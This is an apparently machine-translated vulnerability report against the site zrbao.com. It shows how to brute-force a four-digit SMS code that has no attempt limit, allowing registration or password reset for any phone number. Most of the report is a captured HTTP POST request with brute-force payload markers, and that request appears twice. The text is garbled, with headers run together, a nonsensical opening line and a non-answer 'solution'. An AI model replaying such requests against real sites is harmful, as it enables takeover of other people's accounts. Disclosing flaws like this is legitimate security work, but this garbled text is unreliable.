Any mobile phone number registration and Password Reset
No vulnerability exists in the vulnerability list. The first vulnerability is 20RANK.
The phone Verification Code obtained for registration and password resetting is four digits, and there are no restrictions on the number of times.
Verification Code:
Enter any verification code and capture the packet upon submission: traverse the verification code 0000-9999
POST /User/phoneReg.shtml HTTP/1.1Host: www.zrbao.comUser-Agent: rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: https://www.zrbao.com/reg.shtmlContent-Length: 221Cookie: JSESSIONID=92A2B6CDE6365F56B2AC5EF383E8BAD6-n1; Hm_lvt_b4e112a89209d15dd495141817984363=1448863648; Hm_lpvt_b4e112a89209d15dd495141817984363=1448863666Connection: keep-alivePragma: no-cacheCache-Control: no-cachejsonDataSet=%7B%22phone%22%3A%2213333333333%22%2C%22imgCode%22%3A%22afdq%22%2C%22phoneCode%22%3A%22§9999§%22%2C%22pwd%22%3A%22********%22%2C%22recommendUid%22%3A%22%22%2C%22isCheck%22%3Atrue%2C%22logType%22%3A%22web%22%7D
Registered successfully
Login:
Similarly, if you forget your password:
Proof of vulnerability:
The phone Verification Code obtained for registration and password resetting is four digits, and there are no restrictions on the number of times.
Verification Code:
Enter any verification code and capture the packet upon submission: traverse the verification code 0000-9999
POST/User/phoneReg.shtml HTTP/1.1
Host: www.zrbao.comUser-Agent: rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: https://www.zrbao.com/reg.shtmlContent-Length: 221Cookie: JSESSIONID=92A2B6CDE6365F56B2AC5EF383E8BAD6-n1; Hm_lvt_b4e112a89209d15dd495141817984363=1448863648; Hm_lpvt_b4e112a89209d15dd495141817984363=1448863666Connection: keep-alivePragma: no-cacheCache-Control: no-cachejsonDataSet=%7B%22phone%22%3A%2213333333333%22%2C%22imgCode%22%3A%22afdq%22%2C%22phoneCode%22%3A%22§9999§%22%2C%22pwd%22%3A%22********%22%2C%22recommendUid%22%3A%22%22%2C%22isCheck%22%3Atrue%2C%22logType%22%3A%22web%22%7D
Registered successfully
Login:
Similarly, if you forget your password:
Solution:
You understand.